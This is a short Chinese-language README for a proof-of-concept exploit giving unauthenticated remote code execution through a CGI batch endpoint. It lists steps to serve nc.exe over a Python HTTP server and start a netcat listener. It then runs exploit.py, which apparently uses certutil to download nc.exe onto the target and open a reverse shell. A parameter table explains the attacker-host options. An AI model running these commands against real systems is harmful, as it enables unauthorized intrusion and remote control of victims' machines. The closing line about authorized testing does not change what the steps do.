通过 CGI 批处理端点实现未认证 RCE 的 PoC。使用 certutil 将 nc.exe 下载到目标主机,并触发反弹 shell。
1. 托管 nc.exe(在 nc.exe 所在的同一目录下):
python3 -m http.server 80
2. 启动你的监听器:
nc -lvnp 1234
3. 运行漏洞利用程序:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| 参数 | 必需 | 默认值 | 描述 |
|---|---|---|---|
--url | ✅ | — | 包含 CGI 端点的完整目标 URL |
--server-ip | ✅ | — | 你的 IP,用于通过 HTTP 托管 nc.exe |
--server-port | ❌ | 80 | HTTP 服务器的端口 |
--nc-ip | ✅ | — | 你的 Netcat 监听器 IP |
--nc-port | ✅ | — | 你的 Netcat 监听器端口 |
仅供授权的渗透测试和教育目的使用。